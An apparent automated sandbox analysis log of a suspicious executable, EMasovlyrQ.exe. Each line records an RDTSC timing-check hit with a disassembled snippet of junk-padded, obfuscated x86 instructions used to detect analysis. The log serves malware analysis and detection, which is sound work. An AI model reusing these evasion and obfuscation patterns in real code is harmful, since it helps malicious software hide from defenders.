Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1103C31 second address: 1103C41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007F7C48CABF16h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1103C41 second address: 1103C91 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F7C49018EDDh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pushad 0x0000000d pushad 0x0000000e push edx 0x0000000f pop edx 0x00000010 pushad 0x00000011 popad 0x00000012 ja 00007F7C49018ED6h 0x00000018 popad 0x00000019 jng 00007F7C49018EDEh 0x0000001f pushad 0x00000020 pushad 0x00000021 popad 0x00000022 pushad 0x00000023 popad 0x00000024 jmp 00007F7C49018EE7h 0x00000029 popad 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1103C91 second address: 1103C9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7C48CABF1Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1103C9F second address: 1103CA5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1104118 second address: 110411E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 110411E second address: 1104122 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 110428E second address: 1104292 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1104292 second address: 110429E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 110429E second address: 11042A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11042A2 second address: 11042A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11043CF second address: 11043E3 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F7C48CABF1Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1106BA1 second address: 1106C31 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F7C49018ED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b mov eax, dword ptr [eax] 0x0000000d jmp 00007F7C49018EDCh 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 push eax 0x00000017 jmp 00007F7C49018EDAh 0x0000001c pop eax 0x0000001d pop eax 0x0000001e push 00000000h 0x00000020 push eax 0x00000021 call 00007F7C49018ED8h 0x00000026 pop eax 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b add dword ptr [esp+04h], 00000017h 0x00000033 inc eax 0x00000034 push eax 0x00000035 ret 0x00000036 pop eax 0x00000037 ret 0x00000038 xor ecx, dword ptr [ebp+122D297Fh] 0x0000003e movzx edi, ax 0x00000041 push 00000003h 0x00000043 mov edx, dword ptr [ebp+122D3A04h] 0x00000049 push 00000000h 0x0000004b js 00007F7C49018EDCh 0x00000051 push 00000003h 0x00000053 jc 00007F7C49018EDCh 0x00000059 mov edx, dword ptr [ebp+122D2BF7h] 0x0000005f push F616E3FBh 0x00000064 push ecx 0x00000065 push eax 0x00000066 push edx 0x00000067 jmp 00007F7C49018EE2h 0x0000006c rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1106D97 second address: 1106D9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1106ECB second address: 1106ED1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1106ED1 second address: 1106ED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1127FF2 second address: 1128007 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7C49018EDCh 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 10F6D55 second address: 10F6D7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F7C48CABF27h 0x0000000b jnc 00007F7C48CABF1Ch 0x00000011 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1126143 second address: 112614B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 112614B second address: 1126161 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F7C48CABF16h 0x0000000a pop ecx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 jno 00007F7C48CABF16h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1126161 second address: 1126165 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1126165 second address: 112616B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 112616B second address: 1126174 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1126174 second address: 112617A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11262BA second address: 11262C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11262C0 second address: 11262D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C48CABF1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jno 00007F7C48CABF16h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11266E8 second address: 11266EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11266EC second address: 112670C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7C48CABF25h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edi 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 112684B second address: 1126851 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1126C5F second address: 1126C63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1126C63 second address: 1126C6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1126DB9 second address: 1126DBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1126DBD second address: 1126DD7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7C49018ED6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7C49018EDCh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1126DD7 second address: 1126DDD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1126DDD second address: 1126DE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 111EFE4 second address: 111EFE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 111EFE8 second address: 111F01F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7C49018EE9h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F7C49018EE8h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 111F01F second address: 111F027 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 111F027 second address: 111F02B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11270BD second address: 11270CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C48CABF1Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1127670 second address: 1127684 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pushad 0x0000000c popad 0x0000000d jc 00007F7C49018ED6h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1127684 second address: 1127694 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7C48CABF1Ah 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1127694 second address: 11276D1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jng 00007F7C49018ED6h 0x0000000d jng 00007F7C49018ED6h 0x00000013 jl 00007F7C49018ED6h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c js 00007F7C49018F03h 0x00000022 jmp 00007F7C49018EE7h 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11276D1 second address: 11276D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 112795F second address: 1127965 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1127965 second address: 1127985 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F7C48CABF16h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jbe 00007F7C48CABF1Ch 0x00000012 jo 00007F7C48CABF1Eh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1127AE6 second address: 1127AED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1127AED second address: 1127AF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1127AF3 second address: 1127AF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 112D0B0 second address: 112D0BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F7C48CABF16h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 112D0BB second address: 112D0D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F7C49018EDEh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 112D0D4 second address: 112D0D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 112D8FA second address: 112D8FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 112D8FF second address: 112D90B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 112EA67 second address: 112EA6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 112EA6D second address: 112EA73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 112EA73 second address: 112EA7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 112EA7A second address: 112EA7F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 113406E second address: 1134072 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1134072 second address: 1134076 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1134076 second address: 113407C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1133871 second address: 1133877 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1133877 second address: 113387B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 113387B second address: 113387F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 113387F second address: 1133885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1134782 second address: 11347D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C48CABF25h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d popad 0x0000000e push eax 0x0000000f jne 00007F7C48CABF1Ah 0x00000015 mov eax, dword ptr [esp+04h] 0x00000019 pushad 0x0000001a push eax 0x0000001b jno 00007F7C48CABF16h 0x00000021 pop eax 0x00000022 pushad 0x00000023 jmp 00007F7C48CABF20h 0x00000028 push ebx 0x00000029 pop ebx 0x0000002a popad 0x0000002b popad 0x0000002c mov eax, dword ptr [eax] 0x0000002e push eax 0x0000002f push edx 0x00000030 jc 00007F7C48CABF18h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11347D9 second address: 11347E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7C49018EDAh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11347E7 second address: 1134801 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7C48CABF16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 ja 00007F7C48CABF18h 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1134801 second address: 1134806 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1134806 second address: 1134826 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F7C48CABF16h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop eax 0x0000000e mov dword ptr [ebp+122D2C40h], edi 0x00000014 push F204B932h 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push edx 0x0000001d pop edx 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1134826 second address: 113482B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1134986 second address: 113498B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 113498B second address: 11349A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7C49018EE3h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1135436 second address: 113543A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1135731 second address: 113573C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F7C49018ED6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 113573C second address: 1135750 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F7C48CABF1Ah 0x0000000f rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1135750 second address: 1135756 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1135975 second address: 113597B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 113597B second address: 113599F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C49018EE8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 113599F second address: 11359AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F7C48CABF16h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1135F66 second address: 1135FDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F7C49018EE9h 0x00000008 jg 00007F7C49018ED6h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 jmp 00007F7C49018EDBh 0x00000019 push 00000000h 0x0000001b and edi, 41ECF8EAh 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push edx 0x00000026 call 00007F7C49018ED8h 0x0000002b pop edx 0x0000002c mov dword ptr [esp+04h], edx 0x00000030 add dword ptr [esp+04h], 0000001Dh 0x00000038 inc edx 0x00000039 push edx 0x0000003a ret 0x0000003b pop edx 0x0000003c ret 0x0000003d sub dword ptr [ebp+122D3A10h], ebx 0x00000043 xchg eax, ebx 0x00000044 jmp 00007F7C49018EDAh 0x00000049 push eax 0x0000004a push esi 0x0000004b push eax 0x0000004c push edx 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1135FDF second address: 1135FE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1137864 second address: 113786A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 113786A second address: 113786F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 113786F second address: 1137887 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7C49018EE4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1137887 second address: 113788B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 10F1E84 second address: 10F1E8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1138DDC second address: 1138DF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7C48CABF20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F7C48CABF1Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 1138DF8 second address: 1138E3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 jmp 00007F7C49018EE8h 0x0000000b push 00000000h 0x0000000d ja 00007F7C49018EE3h 0x00000013 push 00000000h 0x00000015 sub si, B80Fh 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d push ebx 0x0000001e jng 00007F7C49018ED6h 0x00000024 pop ebx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 113A308 second address: 113A30E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 11396B3 second address: 11396BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 113A128 second address: 113A12C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\EMasovlyrQ.exe	RDTSC instruction interceptor: First address: 113AE46 second address: 113AE6E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F7C49018EE3h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7C49018EDCh 0x00000013 rdtsc
